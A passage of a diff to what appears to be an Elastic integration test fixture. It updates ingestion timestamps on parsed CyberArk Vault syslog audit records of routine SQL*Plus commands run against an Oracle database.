Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT 
CHAR_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND ((UPPER(USER) LIKE USERID) OR (USERID \\\\= 'PUBLIC')) AND (UPPER(ATTRIBUTE) \\\\= 'ROLES');ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=380B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -578,7 +578,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683121400Z", + "ingested": "2021-12-14T14:42:26.430587804Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=BEGIN DBMS_APPLICATION_INFO.SET_MODULE(:1,NULL)\\\\; END\\\\; (Parameters bound by position: 1\\\\=[SQL*Plus]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=596B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=BEGIN DBMS_APPLICATION_INFO.SET_MODULE(:1,NULL)\\\\; END\\\\; (Parameters bound by 
position: 1\\\\=[SQL*Plus]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=596B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -697,7 +697,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683125200Z", + "ingested": "2021-12-14T14:42:26.430588233Z", "original": "\u003c5\u003e1 2021-03-25T14:56:45Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:45\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:45Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT DECODE('A','A','1','2') FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=727B;SrcHost=127.0.0.1;User=HR;VIDOffset=5T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:45\",\"IsoTimestamp\":\"2021-03-25T14:56:45Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT DECODE('A','A','1','2') FROM 
DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=727B;SrcHost=127.0.0.1;User=HR;VIDOffset=5T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -816,7 +816,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683128900Z", + "ingested": "2021-12-14T14:42:26.430588620Z", "original": "\u003c5\u003e1 2021-03-25T14:56:54Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[HELP]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=800B;SrcHost=127.0.0.1;User=HR;VIDOffset=14T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" 
Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:54\",\"IsoTimestamp\":\"2021-03-25T14:56:54Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT INFO FROM SYSTEM.HELP WHERE 
UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[HELP]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=800B;SrcHost=127.0.0.1;User=HR;VIDOffset=14T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -935,7 +935,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683132100Z", + "ingested": "2021-12-14T14:42:26.430589006Z", "original": "\u003c5\u003e1 2021-03-25T14:58:02Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:58:02\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:58:02Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT * FROM DBA_USERS;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1097B;SrcHost=127.0.0.1;User=HR;VIDOffset=82T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:58:02\",\"IsoTimestamp\":\"2021-03-25T14:58:02Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT * FROM 
DBA_USERS;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1097B;SrcHost=127.0.0.1;User=HR;VIDOffset=82T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -1054,7 +1054,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683136Z", + "ingested": "2021-12-14T14:42:26.430589395Z", "original": "\u003c5\u003e1 2021-03-25T14:57:05Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:57:05\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:57:05Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n 